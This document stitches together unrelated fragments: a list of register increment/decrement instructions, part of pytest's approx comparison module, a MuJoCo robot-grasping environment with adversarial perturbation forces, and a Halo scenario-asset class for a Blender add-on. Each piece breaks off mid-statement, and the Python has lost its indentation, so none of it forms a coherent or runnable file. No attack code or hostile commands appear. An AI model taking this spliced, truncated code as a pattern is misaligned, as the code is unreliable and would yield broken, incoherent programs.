kg inc 66 if umr == 2196
kg dec -83 if j != 706
ada inc 739 if gk > -2590
eri dec 379 if eri == -1497
dy inc 638 if aao >= -3583
a dec 130 if is > 1851
mmw dec 399 if uy == 2133
eri inc -195 if f > -2801
j dec 885 if dy > 4339
eri inc -544 if aao == -3587
kg inc 895 if t != 2984
yk inc 258 if dy <= 4350
es dec 660 if dy == 4342
umr inc -92 if gk < -2592
eri inc 361 if x == -504
um dec -298 if gk != -2588
fk dec 532 if j < -184
uy inc 31 if f < -2791
aao dec 31 if j != -182
ada inc 448 if um <= -2113
fk inc -13 if eri <= -1703
t inc -59 if es >= -1971
gk dec -909 if x == -510
es inc 805 if hg >= -112
j dec 734 if kg >= 3919
um inc 369 if aao != -3606
yk inc -548 if dy > 4348
gk inc 934 if j < -182
x dec 346 if hg <= -107
lbf dec -379 if eri != -1718
lbf inc -921 if f >= -2802
mmw inc -191 if eri <= -1703
umr inc 252 if lx != 600
mmw dec 410 if ada >= -330
gk inc 558 if a != 828
mmw dec 320 if um <= -1744
ada dec 517 if t < 2933
is dec -616 if ada > -835
yk dec -406 if j <= -185
yk inc -526 if lbf <= -586
ada inc 368 if j == -188
kg inc -89 if f <= -2791
kg dec -531 if lbf == -590
mmw | |
<reponame>albertvillanova/pytest<gh_stars>0
import math
import pprint
from collections.abc import Iterable
from collections.abc import Mapping
from collections.abc import Sized
from decimal import Decimal
from numbers import Complex
from types import TracebackType
from typing import Any
from typing import Callable
from typing import cast
from typing import Generic
from typing import Optional
from typing import overload
from typing import Pattern
from typing import Tuple
from typing import Type
from typing import TypeVar
from typing import Union
import _pytest._code
from _pytest.compat import final
from _pytest.compat import STRING_TYPES
from _pytest.outcomes import fail
def _non_numeric_type_error(value, at: Optional[str]) -> TypeError:
at_str = " at {}".format(at) if at else ""
return TypeError(
"cannot make approximate comparisons to non-numeric values: {!r} {}".format(
value, at_str
)
)
# builtin pytest.approx helper
class ApproxBase:
"""Provide shared utilities for making approximate comparisons between
numbers or sequences of numbers."""
# Tell numpy to use our `__eq__` operator instead of its.
__array_ufunc__ = None
__array_priority__ = 100
def __init__(self, expected, rel=None, abs=None, nan_ok: bool = False) -> None:
__tracebackhide__ = True
self.expected = expected
self.abs = abs
self.rel = rel
self.nan_ok = nan_ok
self._check_type()
def __repr__(self) -> str:
raise NotImplementedError
def __eq__(self, actual) -> bool:
return all(
a == self._approx_scalar(x) for a, x in self._yield_comparisons(actual)
)
# Ignore type because of https://github.com/python/mypy/issues/4266.
__hash__ = None # type: ignore
def __ne__(self, actual) -> bool:
return not (actual == self)
def _approx_scalar(self, x) -> "ApproxScalar":
return ApproxScalar(x, rel=self.rel, abs=self.abs, nan_ok=self.nan_ok)
def _yield_comparisons(self, actual):
"""Yield all the pairs of numbers to be compared.
This is used to implement the `__eq__` method.
"""
raise NotImplementedError
def _check_type(self) -> None:
"""Raise a TypeError if the expected value is not a valid type."""
# This is only a concern if the expected value is a sequence. In every
# other case, the approx() function ensures that the expected value has
# a numeric type. For this reason, the default is to do nothing. The
# classes that deal with sequences should reimplement this method to
# raise if there are any non-numeric elements in the sequence.
pass
def _recursive_list_map(f, x):
if isinstance(x, list):
return list(_recursive_list_map(f, xi) for xi in x)
else:
return f(x)
class ApproxNumpy(ApproxBase):
"""Perform approximate comparisons where the expected value is numpy array."""
def __repr__(self) -> str:
list_scalars = _recursive_list_map(self._approx_scalar, self.expected.tolist())
return "approx({!r})".format(list_scalars)
def __eq__(self, actual) -> bool:
import numpy as np
# self.expected is supposed to always be an array here.
if not np.isscalar(actual):
try:
actual = np.asarray(actual)
except Exception as e:
raise TypeError(
"cannot compare '{}' to numpy.ndarray".format(actual)
) from e
if not np.isscalar(actual) and actual.shape != self.expected.shape:
return False
return ApproxBase.__eq__(self, actual)
def _yield_comparisons(self, actual):
import numpy as np
# `actual` can either be a numpy array or a scalar, it is treated in
# `__eq__` before being passed to `ApproxBase.__eq__`, which is the
# only method that calls this one.
if np.isscalar(actual):
for i in np.ndindex(self.expected.shape):
yield actual, self.expected[i].item()
else:
for i in np.ndindex(self.expected.shape):
yield actual[i].item(), self.expected[i].item()
class ApproxMapping(ApproxBase):
"""Perform approximate comparisons where the expected value is a mapping
with numeric values (the keys can be anything)."""
def __repr__(self) -> str:
return "approx({!r})".format(
{k: self._approx_scalar(v) for k, v in self.expected.items()}
)
def __eq__(self, actual) -> bool:
try:
if set(actual.keys()) != set(self.expected.keys()):
return False
except AttributeError:
return False
return ApproxBase.__eq__(self, actual)
def _yield_comparisons(self, actual):
for k in self.expected.keys():
yield actual[k], self.expected[k]
def _check_type(self) -> None:
__tracebackhide__ = True
for key, value in self.expected.items():
if isinstance(value, type(self.expected)):
msg = "pytest.approx() does not support nested dictionaries: key={!r} value={!r}\n full mapping={}"
raise TypeError(msg.format(key, value, pprint.pformat(self.expected)))
class ApproxSequencelike(ApproxBase):
"""Perform approximate comparisons where the expected value is a sequence of numbers."""
def __repr__(self) -> str:
seq_type = type(self.expected)
if seq_type not in (tuple, list, set):
seq_type = list
return "approx({!r})".format(
seq_type(self._approx_scalar(x) for x in self.expected)
)
def __eq__(self, actual) -> bool:
try:
if len(actual) != len(self.expected):
return False
except TypeError:
return False
return ApproxBase.__eq__(self, actual)
def _yield_comparisons(self, actual):
return zip(actual, self.expected)
def _check_type(self) -> None:
__tracebackhide__ = True
for index, x in enumerate(self.expected):
if isinstance(x, type(self.expected)):
msg = "pytest.approx() does not support nested data structures: {!r} at index {}\n full sequence: {}"
raise TypeError(msg.format(x, index, pprint.pformat(self.expected)))
class ApproxScalar(ApproxBase):
"""Perform approximate comparisons where the expected value is a single number."""
# Using Real should be better than this Union, but not possible yet:
# https://github.com/python/typeshed/pull/3108
DEFAULT_ABSOLUTE_TOLERANCE = 1e-12 # type: Union[float, Decimal]
DEFAULT_RELATIVE_TOLERANCE = 1e-6 # type: Union[float, Decimal]
def __repr__(self) -> str:
"""Return a string communicating both the expected value and the
tolerance for the comparison being made.
For example, ``1.0 ± 1e-6``, ``(3+4j) ± 5e-6 ∠ ±180°``.
"""
# Don't show a tolerance for values that aren't compared using
# tolerances, i.e. non-numerics and infinities. Need to call abs to
# handle complex numbers, e.g. (inf + 1j).
if (not isinstance(self.expected, (Complex, Decimal))) or math.isinf(
abs(self.expected)
):
return str(self.expected)
# If a sensible tolerance can't be calculated, self.tolerance will
# raise a ValueError. In this case, display '???'.
try:
vetted_tolerance = "{:.1e}".format(self.tolerance)
if (
isinstance(self.expected, Complex)
and self.expected.imag
and not math.isinf(self.tolerance)
):
vetted_tolerance += " ∠ ±180°"
except ValueError:
vetted_tolerance = "???"
return "{} ± {}".format(self.expected, vetted_tolerance)
def __eq__(self, actual) -> bool:
"""Return whether the given value is equal to the expected value
within the pre-specified tolerance."""
if _is_numpy_array(actual):
# Call ``__eq__()`` manually to prevent infinite-recursion with
# numpy<1.13. See #3748.
return all(self.__eq__(a) for a in actual.flat)
# Short-circuit exact equality.
if actual == self.expected:
return True
# If either type is non-numeric, fall back to strict equality.
# NB: we need Complex, rather than just Number, to ensure that __abs__,
# __sub__, and __float__ are defined.
if not (
isinstance(self.expected, (Complex, Decimal))
and isinstance(actual, (Complex, Decimal))
):
return False
# Allow the user to control whether NaNs are considered equal to each
# other or not. The abs() calls are for compatibility with complex
# numbers.
if math.isnan(abs(self.expected)):
return self.nan_ok and math.isnan(abs(actual))
# Infinity shouldn't be approximately equal to anything but itself, but
# if there's a relative tolerance, it will be infinite and infinity
# will seem approximately equal to everything. The equal-to-itself
# case would have been short circuited above, so here we can just
# return false if the expected value is infinite. The abs() call is
# for compatibility with complex numbers.
if math.isinf(abs(self.expected)):
return False
# Return true if the two numbers are within the tolerance.
result = abs(self.expected - actual) <= self.tolerance # type: bool
return result
# Ignore type because of https://github.com/python/mypy/issues/4266.
__hash__ = None # type: ignore
@property
def tolerance(self):
"""Return the tolerance for the comparison.
This could be either an absolute tolerance or a relative tolerance,
depending on what the user specified or which would be larger.
"""
def set_default(x, default):
return x if x is not None else default
# Figure out what the absolute tolerance should be. ``self.abs`` is
# either None or a value specified by the user.
absolute_tolerance = set_default(self.abs, self.DEFAULT_ABSOLUTE_TOLERANCE)
if absolute_tolerance < 0:
raise ValueError(
"absolute tolerance can't be negative: {}".format(absolute_tolerance)
)
if math.isnan(absolute_tolerance):
raise ValueError("absolute tolerance can't be NaN.")
# If the user specified an absolute tolerance but not a relative one,
# just return the absolute tolerance.
if self.rel is None:
if self.abs is not None:
return absolute_tolerance
# Figure out what the relative tolerance should be. ``self.rel`` is
# either None or a value specified by the user. This is done after
# we've made sure the user didn't ask for an absolute tolerance only,
# because we don't want to raise errors about the relative tolerance if
# we aren't even going to use it.
relative_tolerance = set_default(
self.rel, self.DEFAULT_RELATIVE_TOLERANCE
) * abs(self.expected)
if relative_tolerance < 0:
raise ValueError(
"relative tolerance can't be negative: {}".format(absolute_tolerance)
)
if math.isnan(relative_tolerance):
raise ValueError("relative tolerance can't be NaN.")
# Return the larger of the relative and absolute tolerances.
return max(relative_tolerance, absolute_tolerance)
class ApproxDecimal(ApproxScalar):
"""Perform approximate comparisons where the expected value is a Decimal."""
DEFAULT_ABSOLUTE_TOLERANCE = Decimal("1e-12")
DEFAULT_RELATIVE_TOLERANCE = Decimal("1e-6")
def approx(expected, rel=None, abs=None, nan_ok: bool = | |
from collections import OrderedDict
from mujoco_py import MjSim, MjViewer
from mujoco_py import load_model_from_xml, load_model_from_path
import mujoco_py.cymj as cymj
from mujoco_py.generated import const
from mujoco_py import functions
from grasp.utils import MujocoPyRenderer
from grasp.controllers import inverse_kinematics
from grasp.utils.mjcf_utils import xml_path_completion
from grasp.utils.mjcf_utils import image_path_completion
from grasp.utils.mjcf_utils import log_path_completion
from grasp.utils.mjcf_utils import human_path_completion
from grasp.utils.mjcf_utils import model_path_completion
from grasp.utils.mjcf_utils import loss_path_completion
from grasp.utils.mjcf_utils import config_path_completion
from grasp.utils.mjcf_utils import preprocess
from grasp.utils.mjcf_utils import rotateImageAndExtractPatch
from grasp.predict_module import predict_from_img
from grasp.predict_module.predict_API import predict_from_R_table
from grasp.predict_module import init_detector
from grasp.predict_module.predict_API import init_detector_test
from grasp.predict_module.predict_API import init_detector_test_use_filter
from grasp.predict_module.predict_API import init_detector_with_filter
from grasp.predict_module.predict_API import drawRectangle_spot_on_centre
from grasp.predict_module import build_network
from grasp.predict_module import train_adv
from grasp.predict_module import prepare_X_batch
from grasp.predict_module import prepare_X_batch2
# debug
from grasp.predict_module import adv_predict_from_img
from grasp.predict_module import init_adv
from grasp.predict_module.predict_API import init_force_filter2
import os
import time
import math
import numpy as np
import imageio
import imutils
from termcolor import colored
import random
from time import gmtime, strftime
import xml.etree.ElementTree as ET
import glfw
import shutil
import gc
import copy
from time import sleep
import ipdb
import ast
REGISTERED_ENVS = {}
def register_env(target_class):
REGISTERED_ENVS[target_class.__name__] = target_class
'''
will call init -> base.reset_internal() -> load_model
'''
def make(env_name, *args, **kwargs):
if env_name not in REGISTERED_ENVS:
raise Exception(
"Environment {} not found. Make sure it is a registered environment among: {}".format(
env_name, ", ".join(REGISTERED_ENVS)
)
)
print('Registered_ENV: {}'.format(REGISTERED_ENVS))
return REGISTERED_ENVS[env_name](*args, **kwargs)
class EnvMeta(type):
def __new__(meta, name, base, class_dict):
cls = super().__new__(meta, name, base, class_dict)
_unregistered_envs = ['MujocoEnv','SawyerEnv']
if cls.__name__ not in _unregistered_envs:
register_env(cls)
return cls
class MujocoEnv(metaclass = EnvMeta):
def __init__(
self,
has_renderer=True,
has_offscreen_renderer=False,
render_collision_mesh=True,
render_visual_mesh=True,
control_freq=10,
horizon=1000,
ignore_done=False,
use_camera_obs=False,
camera_name="frontview",
camera_height=256,
camera_width=256,
camera_depth=False,
use_render = True,
log_name = '1',
use_new_model = 'False',
use_pro_new='False',
to_train ='False',
is_human ='False',
train_pro='False',
adv_init=False,
random_perturb=False,
use_pro_name='',
use_new_name='',
object_xml='',
user_name='',
seed =48,
params =None,
test_user = False,
is_test=False,
use_filter=False,
option=0
):
self.has_renderer = True
self.has_offscreen_renderer = has_offscreen_renderer
self.render_collision_mesh = render_collision_mesh
self.render_visual_mesh = render_visual_mesh
self.control_freq = control_freq
self.horizon = horizon
self.ignore_done = ignore_done
self.viewer = None
self.model = None
self.use_new_name=use_new_name
self.use_pro_name = use_pro_name
self.user_name = user_name
self.params = params
self.begin_time = strftime("%Y-%m-%d %H:%M:%S", gmtime())
#random init of object size, location and orientation
if object_xml =='all.xml':
self.random_init= True
else:
self.random_init = False
self.object_xml = object_xml
print('model used: {}'.format(self.object_xml))
# settings for camera observations
self.use_camera_obs = use_camera_obs
if self.use_camera_obs and not self.has_offscreen_renderer:
raise ValueError("Camera observations require an offscreen renderer.")
self.camera_name = camera_name
if self.use_camera_obs and self.camera_name is None:
raise ValueError("Must specify camera name when using camera obs")
self.camera_height = camera_height
self.camera_width = camera_width
self.camera_depth = camera_depth
# required by stable_baselines monitor
self.metadata = {'render.modes': []}
self.reward_range = (-float('inf'), float('inf'))
self.spec = None
self.speed = 1.
self.pert = 1
self._reset_internal()
#initialize detector only once
self.num_samples = 128
self.num_samples_spot = 17#17
self.batch_update = 2
self.train_batch_update= 4 #7
self.record_state_force_filter = []
print(colored('initialize protagonist detection model', 'red'))
self.lr_rate = 0.0001 #0.001
#self.random_init = True ### test script
self.adv_start_idx = 100
self.is_valid_sample = True
self.use_force_filter = use_filter#False
self.is_test = is_test#False
self.contained_curriculum = None
self.contained_curriculum_test = None
self.option = option
self.empty_num = 0
self.lift_success = False
self.failed_cases_stack1 = []
self.failed_cases_stack2 = []
self.max_steps = 0
self.R_table_update_info = None
self.is_force_classify_test = False
self.num_help_samples = 0
self.num_adv_samples = 0
self.default_filtering = True
self.patch_Is_resized_vec2=[]
self.y_train_vec2=[]
self.fc8_predictions_vec2=[]
self.pro_save_num2 = 1
if not self.random_init:
if self.object_xml =='half-nut.xml' :
self.lr_rate = 0.0001#0.00001
if self.object_xml=='round-nut.xml':
self.lr = 0.005
self.G = None
self.G_filter = None
self.G_force = None
if not is_test:
if use_filter:
self.G = init_detector_with_filter(self.num_samples, use_pro_new, use_pro_name, self.num_samples,
gpu_id=0, lr_rate=self.lr_rate, test_user=test_user)
self.G_filter = init_detector(self.num_samples, use_pro_new, use_pro_name, self.num_samples,
gpu_id=0, lr_rate=self.lr_rate, test_user=test_user)
else:
self.G = init_detector(self.num_samples, use_pro_new, use_pro_name, self.num_samples,
gpu_id=0, lr_rate=self.lr_rate, test_user=test_user)
self.G_filter = init_detector_with_filter(self.num_samples, use_pro_new, use_pro_name, self.num_samples,
gpu_id=0, lr_rate=self.lr_rate, test_user=test_user)
elif use_filter:
self.G = init_detector_test_use_filter(self.num_samples, use_pro_new, use_pro_name, self.num_samples,
gpu_id=0, lr_rate=self.lr_rate, test_user=test_user, option=self.option)
elif not use_filter:
self.G = init_detector_test(self.num_samples, use_pro_new, use_pro_name, self.num_samples,
gpu_id=0, lr_rate=self.lr_rate, test_user=test_user, option=self.option)
self.is_once_created_R_table = False
self.is_once_created_R_table2 = False
self.is_once_created_filter = False
self.center_pt = None
self.R_table = None
self.R_table2 = None
#self.F_table = None
self.crop_h_ = None
self.crop_w_ = None
self.min_coord = None
self.range_ = None
self.training_R_table_ground_truth = False
self.count_to_100 = 0
self.current_coord_offset_X = 0#200#60#270
self.current_coord_offset_Y = 0
self.post_reward_list = []
self.stop_training = False
self.post_reward = 1
self.force_type = None
self.save_R_table_purterbed = False
self.save_R_table_Up = False
self.thold_start_using_filter = 25 # 25
self.force_type_inst = False
# the first means no force is applied
# object to use
force = 3.5
if not self.random_init:
force = 3.5
if self.object_xml=='bottle.xml':
force= 3.5
if self.object_xml=='bread.xml':
force=3
if self.object_xml=='new_cube.xml':
force=3.0
if self.object_xml=='round-nut.xml':
force=6 #later changed to 4
if self.object_xml =='half-nut.xml':
force = 5.5
if self.object_xml =='cube.xml':
force = 1.5
down_force = 0.3
if not self.random_init:
down_force = 1
if self.object_xml == 'cube.xml':
down_force = 0.3
if self.object_xml == 'new_cube.xml':
down_force = 0.5
if self.object_xml =='half-nut.xml':
down_force= 0.3
print(colored('obejct_xml: {}, force: {}, down_force: {}'.format(self.object_xml, force, down_force),'red'))
self.is_human = is_human
if self.is_human:
self.adv_forces = np.array([[0, 0, 0, 0, 0, 0],[-force, 0, 0, 0, 0, 0], [0, -force, 0, 0, 0, 0], [force ,0, 0, 0, 0, 0], [0, force, 0, 0, 0, 0], [0, 0, force, 0, 0, 0], [0, 0, -down_force, 0, 0, 0]])
self.idx_to_action = {0: 'nothing', 1: 'left', 2: 'outward', 3: 'right', 4: 'inside', 5: 'up', 6:'down'}
else:
self.adv_forces = np.array([[-force, 0, 0, 0, 0, 0] , [0 , 0, -down_force, 0, 0, 0], [0, -force, 0, 0, 0, 0], [force ,0, 0, 0, 0, 0], [0, force, 0, 0, 0, 0], [0, 0, force, 0, 0, 0]])
# self.adv_forces = np.array([[0, -force, 0, 0, 0, 0]])
self.idx_to_action = {0:'left', 1: 'down', 2:'outward', 3:'right', 4:'inside', 5:'up'}
# self.idx_to_action = {0:'outward'}
self.n_adv_outputs = len(self.adv_forces)
self.log_name = log_name
# init adv policy, get sess
self.adv_init=adv_init
self.G_adv = None
if not self.is_human and self.adv_init:
print(colored('initialize adversarial detection model', 'blue'))
# self.adv_policy = build_network(outputs=self.n_adv_outputs, use_new_model=use_new_model, use_new_name=self.use_new_name, log_name=self.log_name, gpu_id=3)
self.G_adv = init_adv(self.num_samples, use_new_model, use_new_name, self.num_samples, gpu_id=0, adv_lr_rate =0.001)
#self.G_force = init_force_filter(batch_size=1, gpu_id=0, lr_rate=0.01, Collective_dimension=2323)
self.fc8_norms = None
self.fc8_norms2 = None
# collect adv inputs
self.rot_images=[]
self.rot_y_batches=[]
self.train_nums =1
self.pro_train_nums=1
self.pro_train_nums_filter=1
self.save_num =1
self.pro_save_num =1
# record reward, adv_error
self.adv_error_logs=[]
self.reward_logs=[]
self.total_steps = 0
self.use_render = use_render
self.use_new_model = use_new_model
self.to_train = to_train
self.intention = 0#-1 #initial intention == help
self.error_log_path = log_path_completion('error_log{}.txt'.format(self.log_name))
self.reward_log_path = log_path_completion('reward_log{}.txt'.format(self.log_name))
self.adv_loss_log_path = loss_path_completion('adv_loss_log{}.txt'.format(self.log_name))
self.pro_loss_log_path = loss_path_completion('pro_loss_log{}.txt'.format(self.log_name))
self.pro_loss_log_path2 = loss_path_completion('pro_loss_log_filter{}.txt'.format(self.log_name))
self.config_log_path = config_path_completion('config_log{}.txt'.format(self.log_name))
# if file already exists, delete first
if os.path.exists(self.error_log_path):
os.remove(self.error_log_path)
if os.path.exists(self.reward_log_path):
os.remove(self.reward_log_path)
if os.path.exists(self.adv_loss_log_path):
os.remove(self.adv_loss_log_path)
if os.path.exists(self.pro_loss_log_path):
os.remove(self.pro_loss_log_path)
if os.path.exists(self.config_log_path):
os.remove(self.config_log_path)
self.human_error_log_path = human_path_completion('human_error_log{}.txt'.format(self.log_name))
self.human_reward_log_path = human_path_completion('human_reward_log{}.txt'.format(self.log_name))
if os.path.exists(self.human_error_log_path):
os.remove(self.human_error_log_path)
if os.path.exists(self.human_reward_log_path):
os.remove(self.human_reward_log_path)
# delete predict image directory is already exists
if os.path.exists(image_path_completion(self.log_name)):
shutil.rmtree(image_path_completion(self.log_name))
# train protagonist policy
self.train_pro = train_pro
self.patch_Is_resized_vec=[]
self.y_train_vec=[]
self.fc8_predictions_vec=[]
# inference
self.infer_adv = False
self.random_perturb= random_perturb
#log
self.write_log_num =1
self.write_log_update = 5
# alpha
self.alpha = 0.20
if not self.random_init:
self.alpha= 0.20
if self.object_xml == 'cube.xml':
self.alpha = 0.25
elif self.object_xml =='bottle.xml':
self.alpha = 0.20
elif self.object_xml == 'half-nut.xml':
self.alpha = 0.5
self.early_stop_num = 45
self.seed = seed
#fix random perturb seed
np.random.seed(int(time.time() + np.random.randint(10, 50)))
# write log info
print(colored('print logging info ', 'red'))
with open(self.config_log_path, 'w') as fw:
fw.write('User name: ' + self.user_name + '\n')
fw.write('Begin time: ' + self.begin_time + '\n\n\n')
fw.write('Config params: '+ '\n')
for key, val in self.params.items():
fw.write(str(key) + ': ' + str(val) + '\n')
fw.write('\n\n\n')
fw.write('Other params: ' + '\n')
fw.write('alpha: ' + str(self.alpha) + '\n')
fw.write('early stop num : ' + str(self.early_stop_num) + '\n')
fw.write('num samples: ' + str(self.num_samples)+ '\n')
fw.write('adv batch update: ' + str(self.batch_update)+ '\n')
fw.write('pro batch update: ' + str(self.train_batch_update)+ '\n')
fw.write('write log update: ' + str(self.write_log_update)+ '\n')
fw.write('random init: ' + str(self.random_init)+ '\n')
fw.write('seed: ' + str(self.seed)+ '\n')
fw.write('\n\n\n')
fw.write('Force config: ' + '\n')
for item in self.adv_forces:
fw.write(" ".join(map(str, item)))
fw.write('\n')
fw.write('\n')
for key,val in self.idx_to_action.items():
fw.write(str(key) + ':' + val)
fw.write('\n')
fw.write('\n')
if self.is_human:
with open(self.config_log_path, 'w') as fw:
fw.write('User name: ' + self.user_name + '\n')
fw.write('Begin time: ' + self.begin_time + '\n\n\n')
fw.write('Config params: ' + '\n')
for key, val in self.params.items():
fw.write(str(key) + ': ' + str(val) + '\n')
fw.write('\n\n\n')
fw.write('Other params: ' + '\n')
fw.write('alpha: ' + str(self.alpha)+ '\n')
fw.write('early stop num : ' + str(self.early_stop_num)+ '\n')
fw.write('num samples: ' + str(self.num_samples)+ '\n')
fw.write('adv batch update: ' + str(self.batch_update)+ '\n')
fw.write('pro batch update: ' + str(self.train_batch_update)+ '\n')
fw.write('write log update: ' | |
# ##### BEGIN MIT LICENSE BLOCK #####
#
# MIT License
#
# Copyright (c) 2022 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# ##### END MIT LICENSE BLOCK #####
from mathutils import Vector, Euler
SALT_SIZE = 32
class ScenarioAsset():
def __init__(self):
self.header = None
self.scenario_body_header = None
self.scenario_body = None
self.skies_header = None
self.skies = None
self.object_name_header = None
self.object_names = None
self.scenery_header = None
self.scenery = None
self.scenery_palette_header = None
self.scenery_palette = None
self.bipeds_header = None
self.bipeds = None
self.biped_palette_header = None
self.biped_palette = None
self.vehicles_header = None
self.vehicles = None
self.vehicle_palette_header = None
self.vehicle_palette = None
self.equipment_header = None
self.equipment = None
self.equipment_palette_header = None
self.equipment_palette = None
self.weapon_header = None
self.weapons = None
self.weapon_palette_header = None
self.weapon_palette = None
self.device_machine_header = None
self.device_machines = None
self.device_machine_palette_header = None
self.device_machine_palette = None
self.light_volume_header = None
self.light_volumes = None
self.light_volume_palette_header = None
self.light_volume_palette = None
self.player_starting_profile_header = None
self.player_starting_profiles = None
self.player_starting_location_header = None
self.player_starting_locations = None
self.trigger_volumes_header = None
self.trigger_volumes = None
self.decals_header = None
self.decals = None
self.decal_palette_header = None
self.decal_palette = None
self.style_palette_header = None
self.style_palette = None
self.squad_groups_header = None
self.squad_groups = None
self.squads_header = None
self.squads = None
self.zones_header = None
self.zones = None
self.character_palette_header = None
self.character_palette = None
self.scripting_data_header = None
self.scripting_data = None
self.cutscene_flags_header = None
self.cutscene_flags = None
self.cutscene_camera_points_header = None
self.cutscene_camera_points = None
self.orders_header = None
self.orders = None
self.triggers_header = None
self.triggers = None
class ScenarioBody:
def __init__(self, unused_tag_ref=None, skies_tag_block=None, scenario_type=0, scenario_flags=0, child_scenarios_tag_block=None, local_north=0.0,
predicted_resources_tag_block=None, functions_tag_block=None, editor_scenario_data=0, comments_tag_block=None, environment_objects_tag_block=None,
object_names_tag_block=None, scenery_tag_block=None, scenery_palette_tag_block=None, bipeds_tag_block=None, biped_palette_tag_block=None,
vehicles_tag_block=None, vehicle_palette_tag_block=None, equipment_tag_block=None, equipment_palette_tag_block=None, weapons_tag_block=None,
weapon_palette_tag_block=None, device_groups_tag_block=None, machines_tag_block=None, machine_palette_tag_block=None, controls_tag_block=None,
control_palette_tag_block=None, light_fixtures_tag_block=None, light_fixtures_palette_tag_block=None, sound_scenery_tag_block=None,
sound_scenery_palette_tag_block=None, light_volumes_tag_block=None, light_volume_palette_tag_block=None, player_starting_profile_tag_block=None,
player_starting_locations_tag_block=None, trigger_volumes_tag_block=None, recorded_animations_tag_block=None, netgame_flags_tag_block=None,
netgame_equipment_tag_block=None, starting_equipment_tag_block=None, bsp_switch_trigger_volumes_tag_block=None, decals_tag_block=None,
decal_palette_tag_block=None, detail_object_collection_palette_tag_block=None, style_palette_tag_block=None, squad_groups_tag_block=None,
squads_tag_block=None, zones_tag_block=None, mission_scenes_tag_block=None, character_palette_tag_block=None, ai_pathfinding_data_tag_block=None,
ai_animation_references_tag_block=None, ai_script_references_tag_block=None, ai_recording_references_tag_block=None, ai_conversations_tag_block=None,
script_syntax_data_tag_data=None, script_string_data_tag_data=None, scripts_tag_block=None, globals_tag_block=None, references_tag_block=None,
source_files_tag_block=None, scripting_data_tag_block=None, cutscene_flags_tag_block=None, cutscene_camera_points_tag_block=None,
cutscene_titles_tag_block=None, custom_object_names_tag_ref=None, chapter_title_text_tag_ref=None, hud_messages_tag_ref=None,
structure_bsps_tag_block=None, scenario_resources_tag_block=None, old_structure_physics_tag_block=None, hs_unit_seats_tag_block=None,
scenario_kill_triggers_tag_block=None, hs_syntax_datums_tag_block=None, orders_tag_block=None, triggers_tag_block=None,
background_sound_palette_tag_block=None, sound_environment_palette_tag_block=None, weather_palette_tag_block=None, unused_0_tag_block=None,
unused_1_tag_block=None, unused_2_tag_block=None, unused_3_tag_block=None, scavenger_hunt_objects_tag_block=None, scenario_cluster_data_tag_block=None,
salt_array=None, spawn_data_tag_block=None, sound_effect_collection_tag_ref=None, crates_tag_block=None, crate_palette_tag_block=None,
global_lighting_tag_ref=None, atmospheric_fog_palette_tag_block=None, planar_fog_palette_tag_block=None, flocks_tag_block=None, subtitles_tag_ref=None,
decorators_tag_block=None, creatures_tag_block=None, creature_palette_tag_block=None, decorator_palette_tag_block=None,
bsp_transition_volumes_tag_block=None, structure_bsp_lighting_tag_block=None, editor_folders_tag_block=None, level_data_tag_block=None,
game_engine_strings_tag_ref=None, mission_dialogue_tag_block=None, objectives_tag_ref=None, interpolators_tag_block=None, shared_references_tag_block=None,
screen_effect_references_tag_block=None, simulation_definition_table_tag_block=None):
self.unused_tag_ref = unused_tag_ref
self.skies_tag_block = skies_tag_block
self.scenario_type = scenario_type
self.scenario_flags = scenario_flags
self.child_scenarios_tag_block = child_scenarios_tag_block
self.local_north = local_north
self.predicted_resources_tag_block = predicted_resources_tag_block
self.functions_tag_block = functions_tag_block
self.editor_scenario_data = editor_scenario_data
self.comments_tag_block = comments_tag_block
self.environment_objects_tag_block = environment_objects_tag_block
self.object_names_tag_block = object_names_tag_block
self.scenery_tag_block = scenery_tag_block
self.scenery_palette_tag_block = scenery_palette_tag_block
self.bipeds_tag_block = bipeds_tag_block
self.biped_palette_tag_block = biped_palette_tag_block
self.vehicles_tag_block = vehicles_tag_block
self.vehicle_palette_tag_block = vehicle_palette_tag_block
self.equipment_tag_block = equipment_tag_block
self.equipment_palette_tag_block = equipment_palette_tag_block
self.weapons_tag_block = weapons_tag_block
self.weapon_palette_tag_block = weapon_palette_tag_block
self.device_groups_tag_block = device_groups_tag_block
self.machines_tag_block = machines_tag_block
self.machine_palette_tag_block = machine_palette_tag_block
self.controls_tag_block = controls_tag_block
self.control_palette_tag_block = control_palette_tag_block
self.light_fixtures_tag_block = light_fixtures_tag_block
self.light_fixtures_palette_tag_block = light_fixtures_palette_tag_block
self.sound_scenery_tag_block = sound_scenery_tag_block
self.sound_scenery_palette_tag_block = sound_scenery_palette_tag_block
self.light_volumes_tag_block = light_volumes_tag_block
self.light_volume_palette_tag_block = light_volume_palette_tag_block
self.player_starting_profile_tag_block = player_starting_profile_tag_block
self.player_starting_locations_tag_block = player_starting_locations_tag_block
self.trigger_volumes_tag_block = trigger_volumes_tag_block
self.recorded_animations_tag_block = recorded_animations_tag_block
self.netgame_flags_tag_block = netgame_flags_tag_block
self.netgame_equipment_tag_block = netgame_equipment_tag_block
self.starting_equipment_tag_block = starting_equipment_tag_block
self.bsp_switch_trigger_volumes_tag_block = bsp_switch_trigger_volumes_tag_block
self.decals_tag_block = decals_tag_block
self.decal_palette_tag_block = decal_palette_tag_block
self.detail_object_collection_palette_tag_block = detail_object_collection_palette_tag_block
self.style_palette_tag_block = style_palette_tag_block
self.squad_groups_tag_block = squad_groups_tag_block
self.squads_tag_block = squads_tag_block
self.zones_tag_block = zones_tag_block
self.mission_scenes_tag_block = mission_scenes_tag_block
self.character_palette_tag_block = character_palette_tag_block
self.ai_pathfinding_data_tag_block = ai_pathfinding_data_tag_block
